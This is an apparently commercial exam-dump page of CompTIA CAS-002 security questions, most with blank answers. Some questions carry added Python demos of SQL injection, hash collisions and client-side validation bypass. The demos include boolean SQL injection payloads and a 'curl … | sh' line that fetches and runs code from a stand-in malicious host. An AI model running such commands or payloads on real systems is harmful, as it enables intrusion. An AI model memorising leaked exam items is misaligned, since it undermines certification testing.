★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW CAS-002 Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/CAS-002-dumps.html


It is faster and easier to pass the CompTIA CAS-002 exam by using approved CompTIA Advanced Security Practitioner (CASP) questions and answers. Get immediate access to the refreshed CAS-002 exam, find the same core-area CAS-002 questions with professionally verified answers, then pass your exam with a high score.

2021 Mar CAS-002 exam prep

Q1. - (Topic 5) 

A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization’s customer database. The database will be accessed by both the company’s users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). 

A. Physical penetration test of the datacenter to ensure there are appropriate controls. 

B. Penetration testing of the solution to ensure that the customer data is well protected. 

C. Security clauses are implemented into the contract such as the right to audit. 

D. Review of the organizations security policies, procedures and relevant hosting certifications. 

E. Code review of the solution to ensure that there are no back doors located in the software. 

Answer: C,D 


Q2. - (Topic 4) 

An Association is preparing to upgrade their firewalls at five locations around the United States. Each of the three vendors' RFP responses is in line with the security and other requirements. Which of the following should the security administrator do to ensure the firewall platform is appropriate for the Association? 

A. Correlate current industry research with the RFP responses to ensure validity. 

B. Create a lab environment to evaluate each of the three firewall platforms. 

C. Benchmark each firewall platform’s capabilities and experiences with similar sized companies. 

D. Develop criteria and rate each firewall platform based on information in the RFP responses. 

Answer:


Q3. - (Topic 5) 

Company XYZ is building a new customer facing website which must access some corporate resources. The company already has an internal facing web server and a separate server supporting an extranet to which suppliers have access. The extranet web server is located in a network DMZ. The internal website is hosted on a laptop on the internal corporate network. The internal network does not restrict traffic between any internal hosts. Which of the following locations will BEST secure both the intranet and the customer facing website? 

A. The existing internal network segment 

B. Dedicated DMZ network segments 

C. The existing extranet network segment 

D. A third-party web hosting company 

Answer:


Q4. - (Topic 1) 

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company’s online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service (DoS) attack has been successfully executed 5 times a year. The Business Operations department has determined the loss associated with each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation? 

A. $60,000 

B. $100,000 

C. $140,000 

D. $200,000 

Answer:
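The arithmetic behind this question, shown here as an added worked derivation (it is not part of the original question). SLE is the single loss expectancy per attack, ARO the annualized rate of occurrence, and ALE = SLE × ARO:

$$ALE_{before} = SLE \times ARO_{before} = \$40{,}000 \times 5 = \$200{,}000$$

$$ALE_{after} = SLE \times ARO_{after} = \$40{,}000 \times 1 = \$40{,}000$$

$$\text{Value of countermeasure (year 1)} = (ALE_{before} - ALE_{after}) - \text{cost} = \$160{,}000 - \$100{,}000 = \$60{,}000$$

The check a practitioner applies: the risk reduction is ALE before minus ALE after, and only the net of that reduction against the control's cost counts as value earned; quoting the $160,000 reduction alone ignores what was spent to get it.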


Q5. - (Topic 3) 

An administrator at a small company replaces servers whenever budget money becomes available. Over the past several years the company has acquired and still uses 20 servers and 50 desktops from five different computer manufacturers. Which of the following are management challenges and risks associated with this style of technology lifecycle management? 

A. Decreased security posture, decommission of outdated hardware, inability to centrally manage, and performance bottlenecks on old hardware. 

B. Increased mean time to failure rate of legacy servers, OS variances, patch availability, and ability to restore to dissimilar hardware. 

C. OS end-of-support issues, ability to backup data, hardware parts availability, and firmware update availability and management. 

D. Inability to use virtualization, trusted OS complexities, and multiple patch versions based on OS dependency. 

Answer:


Improve CAS-002 practice exam:

Q6. - (Topic 2) 

A security tester is testing a website and performs the following manual query: 

https://www.comptia.com/cookies.jsp?products=5%20and%201=1 

The following response is received in the payload: 

“ORA-000001: SQL command not properly ended” 

Which of the following is the response an example of? 

A. Fingerprinting 

B. Cross-site scripting 

C. SQL injection 

D. Privilege escalation 

Answer:
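The behaviour the tester observed, reproduced offline as an added example that is not part of the original question. It uses an in-memory SQLite table constructed here (the page says nothing about the real schema or backend), shows the concatenated query that lets "5 and 1=1" change the statement, the parameterised version that refuses it, and a small classifier that treats a raw database engine error in the response as evidence of injection and, as a side effect, fingerprints the DBMS from the error format. The error signatures are illustrative patterns, not a complete list.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: a products table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(5, "widget"), (6, "gadget")])
    return conn


def vulnerable_lookup(conn, products_param):
    """String concatenation: the 'products' parameter becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE id = " + products_param
    try:
        return {"rows": [r[0] for r in conn.execute(sql)], "error": None}
    except sqlite3.Error as exc:
        # Echoing the engine's own error to the client is what leaked
        # "ORA-... SQL command not properly ended" in the question.
        return {"rows": [], "error": str(exc)}


def safe_lookup(conn, products_param):
    """Parameter binding: the value can never alter the statement structure."""
    try:
        product_id = int(products_param)  # enforce the expected type as well
    except ValueError:
        return {"rows": [], "error": "invalid id"}
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return {"rows": [r[0] for r in rows], "error": None}


# Illustrative error formats (assumed, not exhaustive) that identify the backend.
DB_ERROR_SIGNATURES = {
    "oracle": re.compile(r"ORA-\d{5}"),
    "mysql": re.compile(r"You have an error in your SQL syntax"),
    "mssql": re.compile(r"Unclosed quotation mark|Incorrect syntax near"),
    "postgresql": re.compile(r"ERROR:\s+syntax error at or near"),
    "sqlite": re.compile(r"syntax error|incomplete input|unrecognized token"),
}


def classify_response(body):
    """A verbatim DB error in an HTTP response means user input reached the
    SQL parser: that is SQL injection, and the format names the DBMS."""
    for dbms, pattern in DB_ERROR_SIGNATURES.items():
        if pattern.search(body):
            return {"sql_injection": True, "dbms": dbms}
    return {"sql_injection": False, "dbms": None}


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "5 and 1=1"))   # row returned: condition was evaluated as SQL
    print(vulnerable_lookup(db, "5 and 1=2"))   # no row: boolean-based confirmation
    print(vulnerable_lookup(db, "5 and"))       # engine error leaks to the caller
    print(safe_lookup(db, "5 and 1=1"))         # rejected before reaching the parser
    print(classify_response("ORA-000001: SQL command not properly ended"))
```

The pair of payloads `5 and 1=1` / `5 and 1=2` is the boolean check a tester runs next: if the first returns the product and the second does not, the input is evaluated as SQL even when the application suppresses error messages. The fix is binding plus type enforcement, not filtering the word "and".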


Q7. - (Topic 5) 

A security manager is concerned about performance and patch management, and, as a result, wants to implement a virtualization strategy to avoid potential future OS vulnerabilities in the host system. The IT manager wants a strategy that would provide the hypervisor with direct communications with the underlying physical hardware allowing the hardware resources to be paravirtualized and delivered to the guest machines. Which of the following recommendations from the server administrator BEST meets the IT and security managers’ requirements? (Select TWO). 

A. Nested virtualized hypervisors 

B. Type 1 hypervisor 

C. Hosted hypervisor with a three layer software stack 

D. Type 2 hypervisor 

E. Bare metal hypervisor with a software stack of two layers 

Answer: B,E 


Q8. - (Topic 3) 

A company receives a subpoena for email that is four years old. Which of the following should the company consult to determine if it can provide the email in question? 

A. Data retention policy 

B. Business continuity plan 

C. Backup and archive processes 

D. Electronic inventory 

Answer:


Q9. - (Topic 5) 

A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is the same. Which of the following explains this? 

A. The infected files were using obfuscation techniques to evade detection by antivirus software. 

B. The infected files were specially crafted to exploit a collision in the hash function. 

C. The infected files were using heuristic techniques to evade detection by antivirus software. 

D. The infected files were specially crafted to exploit diffusion in the hash function. 

Answer:
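What a hash collision means for the integrity check described above, as an added example that is not part of the original question. The "files" are constructed byte strings; the appended command is hypothetical. A strong hash (SHA-256 here) changes for any modification, so an identical digest on different content implies the attacker engineered a collision. To make that concrete without a real collision attack, the block also includes a deliberately weak 8-bit additive checksum and a function that appends a payload plus one compensating byte so the weak digest is unchanged.

```python
import hashlib

# Constructed sample files (not from the page).
CLEAN = b"#!/bin/sh\necho 'installing product'\n"
PAYLOAD = b"curl -s http://malware.example/x | sh\n"   # hypothetical injected command
INFECTED = CLEAN + PAYLOAD


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_integrity(candidate: bytes, known_good: bytes) -> bool:
    """Strong-hash comparison: differs for any change unless a collision was engineered."""
    return sha256(candidate) == sha256(known_good)


def weak_checksum(data: bytes) -> int:
    """Toy 8-bit additive checksum, used only to show what a collision looks like."""
    return sum(data) % 256


def forge_collision(original: bytes, payload: bytes) -> bytes:
    """Append the payload and one padding byte chosen so the weak checksum is
    unchanged: different content, same digest. This is the 'specially crafted'
    property the question describes, shown against a checksum weak enough
    to break by hand."""
    target = weak_checksum(original)
    body = original + payload
    pad = (target - sum(body)) % 256
    return body + bytes([pad])


if __name__ == "__main__":
    print("sha256 matches infected copy:", verify_integrity(INFECTED, CLEAN))   # False
    forged = forge_collision(CLEAN, PAYLOAD)
    print("weak checksum matches forged copy:", weak_checksum(forged) == weak_checksum(CLEAN))  # True
    print("sha256 matches forged copy:", verify_integrity(forged, CLEAN))       # still False
```

Two checks an investigator adds before accepting the collision explanation: which algorithm produced the stored hashes (MD5 and SHA-1 have practical collision attacks; SHA-256 does not), and whether the "clean" backup was taken after the compromise, in which case matching hashes are expected and the collision theory is unnecessary. Either way, a distribution site should publish signed manifests, not bare hashes, so that an attacker who can replace files cannot also replace the reference digests.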

Q491. - (Topic 5) 

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? 

A. The corporate network is the only network that is audited by regulators and customers. 

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. 

C. Home networks are unknown to attackers and less likely to be targeted directly. 

D. Employees are more likely to be using personal computers for general web browsing when they are at home. 

Answer:


Q10. - (Topic 5) 

A new web-based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool? 

A. The tool could show that input validation was only enabled on the client side 

B. The tool could enumerate backend SQL database table and column names 

C. The tool could force HTTP methods such as DELETE that the server has denied 

D. The tool could fuzz the application to determine where memory leaks occur 

Answer:
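The finding an HTTP interceptor most readily produces, simulated offline as an added example that is not part of the original question. The form fields, their validation rules and the two server handlers are all constructed here. The browser-side check runs first, then the request body is edited after validation (which is exactly what an interceptor lets the tester do), and the body is sent to a handler that trusts the client and to one that re-validates on the server.

```python
import json
import re

# Constructed sample form rules (not from the page): what the browser-side JavaScript enforces.
CLIENT_RULES = {"quantity": r"^[1-9]$", "role": r"^user$"}
# Server-side rules; the hardened handler never takes 'role' from the client at all.
SERVER_RULES = {"quantity": r"[1-9]", "role": r"user"}


def client_validate(form: dict) -> bool:
    """Simulates the JavaScript validation that runs in the browser before submit."""
    return all(re.match(CLIENT_RULES[k], str(v)) for k, v in form.items() if k in CLIENT_RULES)


def intercept_and_tamper(request_body: str) -> str:
    """What the tester does in the interceptor: the browser has already validated and
    serialised the form; the body is edited before it leaves the proxy."""
    form = json.loads(request_body)
    form["quantity"] = 9999
    form["role"] = "admin"
    return json.dumps(form)


def server_trusting_client(request_body: str) -> dict:
    """Vulnerable handler: assumes the fields were validated client-side."""
    form = json.loads(request_body)
    return {"accepted": True, "quantity": form["quantity"], "role": form["role"]}


def server_validating(request_body: str) -> dict:
    """Hardened handler: re-validates every field and derives role from the
    server's own session state rather than the request."""
    form = json.loads(request_body)
    for field, pattern in SERVER_RULES.items():
        if field not in form or not re.fullmatch(pattern, str(form[field])):
            return {"accepted": False, "reason": f"invalid {field}"}
    return {"accepted": True, "quantity": int(form["quantity"]), "role": "user"}


def run_scenario():
    """Validated-in-browser form, tampered in transit, handled both ways."""
    form = {"quantity": 2, "role": "user"}
    assert client_validate(form), "browser check passes on the honest form"
    tampered = intercept_and_tamper(json.dumps(form))
    return server_trusting_client(tampered), server_validating(tampered)


if __name__ == "__main__":
    naive, hardened = run_scenario()
    print("client-only validation:", naive)      # accepts quantity=9999, role=admin
    print("server-side validation:", hardened)   # rejects the tampered body
```

The interceptor does not break anything on the server; it only removes the browser from the trust path. Any control that exists solely in client-side code (field masks, hidden fields, disabled buttons, a role carried in the form) is therefore a suggestion, not a control, and the server must enforce the same rules independently.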